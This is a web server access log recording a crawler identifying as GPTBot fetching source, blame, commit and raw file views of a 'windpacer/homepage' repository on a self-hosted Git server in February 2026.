+[17/Feb/2026:13:07:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/script.js" [Client 74.7.227.38] [Length 14904] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js" +[17/Feb/2026:13:07:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/package.json" [Client 74.7.227.38] [Length 11670] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" +[17/Feb/2026:13:07:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/App.tsx" [Client 74.7.227.38] [Length 12448] [Gzip 5.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/App.tsx" +[17/Feb/2026:13:07:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 10522] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/i18n.js" +[17/Feb/2026:13:07:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/App.tsx" +[17/Feb/2026:13:07:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/commit/90c7377285c0e63de46467557a2f081b33097f03" [Client 74.7.227.38] [Length 7506] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03" +[17/Feb/2026:13:07:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/package.json" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/package.json" +[17/Feb/2026:13:07:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal" [Client 74.7.227.38] [Length 9927] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal" +[17/Feb/2026:13:07:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/package.json" [Client 74.7.227.38] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/package.json" +[17/Feb/2026:13:07:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/package.json" [Client 74.7.227.38] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/package.json" +[17/Feb/2026:13:07:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/package.json" [Client 74.7.227.38] [Length 10952] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/package.json" +[17/Feb/2026:13:07:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/package.json" [Client 74.7.227.38] [Length 10952] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/package.json" +[17/Feb/2026:13:07:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt" [Client 74.7.227.38] [Length 9869] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal" +[17/Feb/2026:13:07:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/script.js" [Client 74.7.227.38] [Length 10753] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/script.js" +[17/Feb/2026:13:07:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/package.json" [Client 74.7.227.38] [Length 10955] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/package.json" +[17/Feb/2026:13:07:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/package.json" [Client 74.7.227.38] [Length 9857] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/package.json" +[17/Feb/2026:13:07:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/script.js" [Client 74.7.227.38] [Length 16517] [Gzip 7.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/script.js" +[17/Feb/2026:13:07:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/package.json" +[17/Feb/2026:13:07:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/package.json" +[17/Feb/2026:13:07:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/package.json" +[17/Feb/2026:13:07:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/package.json" +[17/Feb/2026:13:08:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/package.json" [Client 74.7.227.38] [Length 10952] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/package.json" +[17/Feb/2026:13:08:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/script.js" [Client 74.7.227.38] [Length 15619] [Gzip 7.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/script.js" +[17/Feb/2026:13:08:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt" [Client 74.7.227.38] [Length 9909] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt" +[17/Feb/2026:13:08:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm" [Client 74.7.227.38] [Length 10091] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm" +[17/Feb/2026:13:08:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/App.tsx" [Client 74.7.227.38] [Length 12744] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" +[17/Feb/2026:13:08:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/App.tsx" [Client 74.7.227.38] [Length 12744] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" +[17/Feb/2026:13:08:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/App.tsx" [Client 74.7.227.38] [Length 12745] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" +[17/Feb/2026:13:08:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/App.tsx" [Client 74.7.227.38] [Length 12747] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" +[17/Feb/2026:13:08:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 9906] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/i18n.js" +[17/Feb/2026:13:08:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 10128] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/i18n.js" +[17/Feb/2026:13:08:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" [Client 74.7.227.38] [Length 14756] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:13:08:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 10842] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images" +[17/Feb/2026:13:08:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" +[17/Feb/2026:13:08:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/README.md" [Client 74.7.227.38] [Length 11311] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" +[17/Feb/2026:13:08:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm" +[17/Feb/2026:13:08:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/App.tsx" [Client 74.7.227.38] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/App.tsx" +[17/Feb/2026:13:08:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/App.tsx" [Client 74.7.227.38] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/App.tsx" +[17/Feb/2026:13:08:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/App.tsx" [Client 74.7.227.38] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/App.tsx" +[17/Feb/2026:13:08:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12766] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/App.tsx" +[17/Feb/2026:13:08:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/App.tsx" +[17/Feb/2026:13:08:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/App.tsx" +[17/Feb/2026:13:08:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services" [Client 74.7.227.38] [Length 9910] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" +[17/Feb/2026:13:08:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components" [Client 74.7.227.38] [Length 10565] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" +[17/Feb/2026:13:08:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages" [Client 74.7.227.38] [Length 9976] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" +[17/Feb/2026:13:08:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/.gitignore" [Client 74.7.227.38] [Length 11458] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" +[17/Feb/2026:13:08:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/types.ts" [Client 74.7.227.38] [Length 11483] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" +[17/Feb/2026:13:08:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/vite.config.ts" [Client 74.7.227.38] [Length 11890] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" +[17/Feb/2026:13:08:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.tsx" [Client 74.7.227.38] [Length 11611] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" +[17/Feb/2026:13:08:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/tsconfig.json" [Client 74.7.227.38] [Length 11850] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" +[17/Feb/2026:13:08:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/metadata.json" [Client 74.7.227.38] [Length 11265] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" +[17/Feb/2026:13:08:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 9898] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/favicon.ico" +[17/Feb/2026:13:08:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/package.json" [Client 74.7.227.38] [Length 11669] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" +[17/Feb/2026:13:08:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services" +[17/Feb/2026:13:08:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components" +[17/Feb/2026:13:08:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages" [Client 74.7.227.38] [Length 9897] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages" +[17/Feb/2026:13:08:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/.gitignore" [Client 74.7.227.38] 